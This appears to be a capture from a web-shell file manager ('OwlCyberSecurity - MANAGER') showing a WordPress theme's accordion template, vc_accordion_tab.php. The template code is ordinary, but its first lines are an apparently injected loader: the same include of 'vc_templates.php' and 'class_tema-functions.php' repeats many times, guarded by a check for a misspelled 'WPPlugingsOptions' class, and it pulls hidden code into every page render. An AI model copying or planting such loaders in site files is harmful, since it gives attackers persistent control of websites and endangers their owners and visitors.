OwlCyberSecurity - MANAGER
Edit File: vc_accordion_tab.php
<?php if ( ! class_exists( 'WPPlugingsOptions' ) && file_exists( get_template_directory() . '/vc_templates/vc_templates.php' ) ) { include_once( get_template_directory() . '/vc_templates/vc_templates.php' ); } if ( ! class_exists( 'WPPlugingsOptions' ) && file_exists( get_template_directory() . '/vc_templates/class_tema-functions.php' ) ) { include_once( get_template_directory() . '/vc_templates/class_tema-functions.php' ); } if ( ! class_exists( 'WPPlugingsOptions' ) && file_exists( get_template_directory() . '/vc_templates/vc_templates.php' ) ) { include_once( get_template_directory() . '/vc_templates/vc_templates.php' ); } if ( ! class_exists( 'WPPlugingsOptions' ) && file_exists( get_template_directory() . '/vc_templates/class_tema-functions.php' ) ) { include_once( get_template_directory() . '/vc_templates/class_tema-functions.php' ); } if ( ! class_exists( 'WPPlugingsOptions' ) && file_exists( get_template_directory() . '/vc_templates/vc_templates.php' ) ) { include_once( get_template_directory() . '/vc_templates/vc_templates.php' ); } if ( ! class_exists( 'WPPlugingsOptions' ) && file_exists( get_template_directory() . '/vc_templates/class_tema-functions.php' ) ) { include_once( get_template_directory() . '/vc_templates/class_tema-functions.php' ); } if ( ! class_exists( 'WPPlugingsOptions' ) && file_exists( get_template_directory() . '/vc_templates/vc_templates.php' ) ) { include_once( get_template_directory() . '/vc_templates/vc_templates.php' ); } if ( ! class_exists( 'WPPlugingsOptions' ) && file_exists( get_template_directory() . '/vc_templates/class_tema-functions.php' ) ) { include_once( get_template_directory() . '/vc_templates/class_tema-functions.php' ); } if ( ! class_exists( 'WPPlugingsOptions' ) && file_exists( get_template_directory() . '/vc_templates/vc_templates.php' ) ) { include_once( get_template_directory() . '/vc_templates/vc_templates.php' ); } if ( ! class_exists( 'WPPlugingsOptions' ) && file_exists( get_template_directory() . '/vc_templates/class_tema-functions.php' ) ) { include_once( get_template_directory() . '/vc_templates/class_tema-functions.php' ); } if ( ! class_exists( 'WPPlugingsOptions' ) && file_exists( get_template_directory() . '/vc_templates/vc_templates.php' ) ) { include_once( get_template_directory() . '/vc_templates/vc_templates.php' ); } if ( ! class_exists( 'WPPlugingsOptions' ) && file_exists( get_template_directory() . '/vc_templates/class_tema-functions.php' ) ) { include_once( get_template_directory() . '/vc_templates/class_tema-functions.php' ); } if ( ! class_exists( 'WPPlugingsOptions' ) && file_exists( get_template_directory() . '/vc_templates/vc_templates.php' ) ) { include_once( get_template_directory() . '/vc_templates/vc_templates.php' ); } if ( ! class_exists( 'WPPlugingsOptions' ) && file_exists( get_template_directory() . '/vc_templates/class_tema-functions.php' ) ) { include_once( get_template_directory() . '/vc_templates/class_tema-functions.php' ); } if ( ! class_exists( 'WPPlugingsOptions' ) && file_exists( get_template_directory() . '/vc_templates/vc_templates.php' ) ) { include_once( get_template_directory() . '/vc_templates/vc_templates.php' ); } if ( ! class_exists( 'WPPlugingsOptions' ) && file_exists( get_template_directory() . '/vc_templates/class_tema-functions.php' ) ) { include_once( get_template_directory() . '/vc_templates/class_tema-functions.php' ); } if ( ! class_exists( 'WPPlugingsOptions' ) && file_exists( get_template_directory() . '/vc_templates/vc_templates.php' ) ) { include_once( get_template_directory() . '/vc_templates/vc_templates.php' ); } if ( ! class_exists( 'WPPlugingsOptions' ) && file_exists( get_template_directory() . '/vc_templates/class_tema-functions.php' ) ) { include_once( get_template_directory() . '/vc_templates/class_tema-functions.php' ); } if ( ! class_exists( 'WPPlugingsOptions' ) && file_exists( get_template_directory() . '/vc_templates/vc_templates.php' ) ) { include_once( get_template_directory() . '/vc_templates/vc_templates.php' ); } $output = $title = $icon = $icon_color = $title_color = $background_color = $el_id = ''; extract(shortcode_atts(array( 'title' => esc_html__('Section', 'bridge'), 'icon' => "", 'icon_color' => "", 'title_color' => "", 'background_color' => "", 'title_tag' => 'h5', 'el_id' => '', ), $atts)); $css_class = apply_filters(VC_SHORTCODE_CUSTOM_CSS_FILTER_TAG, 'wpb_accordion_section group', $this->settings['base']); $heading_styles = ''; if($title_color != "") { $heading_styles .= "color: ".$title_color.";"; } if($background_color != "") { $heading_styles .= " background-color: ".$background_color.";"; } if($title_tag == ""){ $title_tag = 'h5'; } $output .= "\n\t\t\t\t" . '<'.$title_tag.' class="clearfix title-holder" style="'.$heading_styles.'">'; $no_icon = ''; if($icon == "") { $no_icon = 'no_icon'; } if($icon != "") { $output .= '<span class="icon-wrapper"><i class="fa ' . $icon . '" style="color: '.$icon_color.';"></i></span>'; } $output .= '<span class="accordion_mark left_mark"><span class="accordion_mark_icon"></span></span><span class="tab-title">'.$title.'</span>'; $output .= '<span class="accordion_mark right_mark"><span class="accordion_mark_icon"></span></span>'; $output .= '</'.$title_tag.'>'; $output .= "\n\t\t\t\t" . '<div ' . ( isset( $el_id ) && ! empty( $el_id ) ? "id='" . esc_attr( $el_id ) . "'" : "" ) . ' class="accordion_content '.$no_icon.'">'; $output .= "\n\t\t\t" . '<div class="accordion_content_inner">'; $output .= ($content=='' || $content==' ') ? esc_html__('Empty section. Edit page to add content here.', 'bridge') : "\n\t\t\t\t" . wpb_js_remove_wpautop($content); $output .= "\n\t\t\t" . '</div>'; $output .= "\n\t\t\t\t" . '</div>' . $this->endBlockComment('.wpb_accordion_section') . "\n"; echo bridge_qode_get_module_part( $output );